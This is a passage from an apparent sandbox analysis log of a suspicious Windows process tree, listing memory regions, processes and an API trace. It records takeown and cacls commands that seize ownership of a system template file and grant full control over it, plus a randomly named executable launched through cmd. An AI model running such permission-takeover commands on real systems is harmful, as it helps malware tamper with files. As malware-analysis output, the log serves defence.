end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1919 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1920 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1921 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1922 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1923 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1924 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1925 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1926 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1927 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1928 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1929 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1930 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1931 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Thread: id = 155 os_tid = 0xe98 Thread: id = 156 os_tid = 0xe8c Thread: id = 157 os_tid = 0xe9c Thread: id = 158 os_tid = 0xe94 Process: id = "28" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x1f8fd000" os_pid = "0xea8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0xa40" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\" /E /G CIiHmnxMn6Ps:F /C" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1967 start_va = 0x730000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 1968 start_va = 0x750000 end_va = 0x751fff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 1969 start_va = 0x760000 end_va = 0x773fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 1970 start_va = 0x780000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 1971 start_va = 0x7c0000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1972 start_va = 0x800000 end_va = 0x803fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 1973 start_va = 0x810000 end_va = 0x810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1974 start_va = 0x820000 end_va = 0x821fff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 1975 start_va = 0xd70000 end_va = 0xd79fff entry_point = 0xd70000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 1976 start_va = 0xd80000 end_va = 0x4d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 1977 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1978 start_va = 0x7f050000 end_va = 0x7f072fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f050000" filename = "" Region: id = 1979 start_va = 0x7f07b000 end_va = 0x7f07dfff entry_point = 0x0 region_type = private name = "private_0x000000007f07b000" filename = "" Region: id = 1980 start_va = 0x7f07e000 end_va = 0x7f07efff entry_point = 0x0 region_type = private name = "private_0x000000007f07e000" filename = "" Region: id = 1981 start_va = 0x7f07f000 end_va = 0x7f07ffff entry_point = 0x0 region_type = private name = "private_0x000000007f07f000" filename = "" Region: id = 1982 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1983 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1984 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 1985 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1986 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 1987 start_va = 0x840000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1988 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1989 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1990 start_va = 0x860000 end_va = 0x95ffff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1991 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 161 os_tid = 0x7e8 Thread: id = 162 os_tid = 0x930 Process: id = "29" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x28502000" os_pid = "0xb48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0xa40" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1992 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\SysWOW64\\takeown.exe" (normalized: "c:\\windows\\syswow64\\takeown.exe") Region: id = 1993 start_va = 0x6a0000 end_va = 0x469ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 1994 start_va = 0x46a0000 end_va = 0x46bffff entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 1995 start_va = 0x46c0000 end_va = 0x46c1fff entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 1996 start_va = 0x46d0000 end_va = 0x46e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046d0000" filename = "" Region: id = 1997 start_va = 0x46f0000 end_va = 0x472ffff entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 1998 start_va = 0x4730000 end_va = 0x476ffff entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 1999 start_va = 0x4770000 end_va = 0x4773fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004770000" filename = "" Region: id = 2000 start_va = 0x4780000 end_va = 0x4780fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004780000" filename = "" Region: id = 2001 start_va = 0x4790000 end_va = 0x4791fff entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 2002 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2003 start_va = 0x7ea00000 end_va = 0x7ea22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea00000" filename = "" Region: id = 2004 start_va = 0x7ea25000 end_va = 0x7ea25fff entry_point = 0x0 region_type = private name = "private_0x000000007ea25000" filename = "" Region: id = 2005 start_va = 0x7ea2c000 end_va = 0x7ea2efff entry_point = 0x0 region_type = private name = "private_0x000000007ea2c000" filename = "" Region: id = 2006 start_va = 0x7ea2f000 end_va = 0x7ea2ffff entry_point = 0x0 region_type = private name = "private_0x000000007ea2f000" filename = "" Region: id = 2007 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2008 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2009 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 2010 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2011 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 2012 start_va = 0x47f0000 end_va = 0x47fffff entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 2013 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2014 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2015 start_va = 0x4950000 end_va = 0x4a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 2016 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 163 os_tid = 0x5b8 Thread: id = 164 os_tid = 0x7f0 Process: id = "30" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x27dcd000" os_pid = "0x190" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x578" cmd_line = "C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"jnwdui.dll.mui\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2049 start_va = 0x540000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2050 start_va = 0x560000 end_va = 0x561fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 2051 start_va = 0x570000 end_va = 0x583fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2052 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2053 start_va = 0x5d0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2054 start_va = 0x6d0000 end_va = 0x6d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 2055 start_va = 0x6e0000 end_va = 0x6e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 2056 start_va = 0x6f0000 end_va = 0x6f1fff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 2057 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2058 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 2059 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2060 start_va = 0x7fc20000 end_va = 0x7fc42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fc20000" filename = "" Region: id = 2061 start_va = 0x7fc49000 end_va = 0x7fc4bfff entry_point = 0x0 region_type = private name = "private_0x000000007fc49000" filename = "" Region: id = 2062 start_va = 0x7fc4c000 end_va = 0x7fc4cfff entry_point = 0x0 region_type = private name = "private_0x000000007fc4c000" filename = "" Region: id = 2063 start_va = 0x7fc4f000 end_va = 0x7fc4ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc4f000" filename = "" Region: id = 2064 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2065 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2066 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 2067 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2068 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 2069 start_va = 0x710000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 2070 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2071 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2072 start_va = 0x770000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 2073 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2075 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2076 start_va = 0x720000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 2077 start_va = 0x870000 end_va = 0x92dfff entry_point = 0x870000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2078 start_va = 0x930000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 2079 start_va = 0xc00000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 2080 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2081 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2082 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2083 start_va = 0x7fb20000 end_va = 0x7fc1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fb20000" filename = "" Region: id = 2084 start_va = 0x7fc46000 end_va = 0x7fc48fff entry_point = 0x0 region_type = private name = "private_0x000000007fc46000" filename = "" Region: id = 2085 start_va = 0x550000 end_va = 0x553fff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 2124 start_va = 0x560000 end_va = 0x563fff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 2125 start_va = 0xc10000 end_va = 0xf46fff entry_point = 0xc10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 165 os_tid = 0xed0 [0221.485] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0221.485] __set_app_type (_Type=0x1) [0221.485] __p__fmode () returned 0x77984d6c [0221.485] __p__commode () returned 0x77985b1c [0221.485] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0221.485] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0221.485] GetCurrentThreadId () returned 0xed0 [0221.485] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xed0) returned 0x84 [0221.485] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0221.485] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0221.485] SetThreadUILanguage (LangId=0x0) returned 0x409 [0221.489] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0221.489] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x6cfb1c | out: phkResult=0x6cfb1c*=0x0) returned 0x2 [0221.490] VirtualQuery (in: lpAddress=0x6cfb23, lpBuffer=0x6cfad4, dwLength=0x1c | out: lpBuffer=0x6cfad4*(BaseAddress=0x6cf000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0221.490] VirtualQuery (in: lpAddress=0x5d0000, lpBuffer=0x6cfad4, dwLength=0x1c | out: lpBuffer=0x6cfad4*(BaseAddress=0x5d0000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0221.490] VirtualQuery (in: lpAddress=0x5d1000, lpBuffer=0x6cfad4, dwLength=0x1c | out: lpBuffer=0x6cfad4*(BaseAddress=0x5d1000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0221.490] VirtualQuery (in: lpAddress=0x5d3000, lpBuffer=0x6cfad4, dwLength=0x1c | out: lpBuffer=0x6cfad4*(BaseAddress=0x5d3000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0221.490] VirtualQuery (in: lpAddress=0x6d0000, lpBuffer=0x6cfad4, dwLength=0x1c | out: lpBuffer=0x6cfad4*(BaseAddress=0x6d0000, AllocationBase=0x6d0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0221.490] GetConsoleOutputCP () returned 0x1b5 [0221.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0221.490] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0221.490] _get_osfhandle (_FileHandle=1) returned 0xc0 [0221.490] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0221.490] _get_osfhandle (_FileHandle=1) returned 0xc0 [0221.490] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0221.490] _get_osfhandle (_FileHandle=0) returned 0x38 [0221.490] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0221.490] GetEnvironmentStringsW () returned 0x777f60* [0221.491] FreeEnvironmentStringsA (penv="=") returned 1 [0221.491] GetEnvironmentStringsW () returned 0x777f60* [0221.491] FreeEnvironmentStringsA (penv="=") returned 1 [0221.491] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x6cea80 | out: phkResult=0x6cea80*=0x94) returned 0x0 [0221.491] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x6cea84, lpData=0x6cea8c, lpcbData=0x6cea88*=0x1000 | out: lpType=0x6cea84*=0x0, lpData=0x6cea8c*=0xc8, lpcbData=0x6cea88*=0x1000) returned 0x2 [0221.491] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x6cea84, lpData=0x6cea8c, lpcbData=0x6cea88*=0x1000 | out: lpType=0x6cea84*=0x4, lpData=0x6cea8c*=0x1, lpcbData=0x6cea88*=0x4) returned 0x0 [0221.491] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x6cea84, lpData=0x6cea8c, lpcbData=0x6cea88*=0x1000 | out: lpType=0x6cea84*=0x0, lpData=0x6cea8c*=0x1, lpcbData=0x6cea88*=0x1000) returned 0x2 [0221.491] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x6cea84, lpData=0x6cea8c, lpcbData=0x6cea88*=0x1000 | out: lpType=0x6cea84*=0x4, lpData=0x6cea8c*=0x0, lpcbData=0x6cea88*=0x4) returned 0x0 [0221.491] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x6cea84, lpData=0x6cea8c, lpcbData=0x6cea88*=0x1000 | out: lpType=0x6cea84*=0x4, lpData=0x6cea8c*=0x40, lpcbData=0x6cea88*=0x4) returned 0x0 [0221.491] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x6cea84, lpData=0x6cea8c, lpcbData=0x6cea88*=0x1000 | out: lpType=0x6cea84*=0x4, lpData=0x6cea8c*=0x40, lpcbData=0x6cea88*=0x4) returned 0x0 [0221.491] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x6cea84, lpData=0x6cea8c, lpcbData=0x6cea88*=0x1000 | out: lpType=0x6cea84*=0x0, lpData=0x6cea8c*=0x40, lpcbData=0x6cea88*=0x1000) returned 0x2 [0221.491] RegCloseKey (hKey=0x94) returned 0x0 [0221.491] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x6cea80 | out: phkResult=0x6cea80*=0x94) returned 0x0 [0221.491] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x6cea84, lpData=0x6cea8c, lpcbData=0x6cea88*=0x1000 | out: lpType=0x6cea84*=0x0, lpData=0x6cea8c*=0x40, lpcbData=0x6cea88*=0x1000) returned 0x2 [0221.491] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x6cea84, lpData=0x6cea8c, lpcbData=0x6cea88*=0x1000 | out: lpType=0x6cea84*=0x4, lpData=0x6cea8c*=0x1, lpcbData=0x6cea88*=0x4) returned 0x0 [0221.491] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x6cea84, lpData=0x6cea8c, lpcbData=0x6cea88*=0x1000 | out: lpType=0x6cea84*=0x0, lpData=0x6cea8c*=0x1, lpcbData=0x6cea88*=0x1000) returned 0x2 [0221.491] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x6cea84, lpData=0x6cea8c, lpcbData=0x6cea88*=0x1000 | out: lpType=0x6cea84*=0x4, lpData=0x6cea8c*=0x0, lpcbData=0x6cea88*=0x4) returned 0x0 [0221.491] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x6cea84, lpData=0x6cea8c, lpcbData=0x6cea88*=0x1000 | out: lpType=0x6cea84*=0x4, lpData=0x6cea8c*=0x9, lpcbData=0x6cea88*=0x4) returned 0x0 [0221.491] 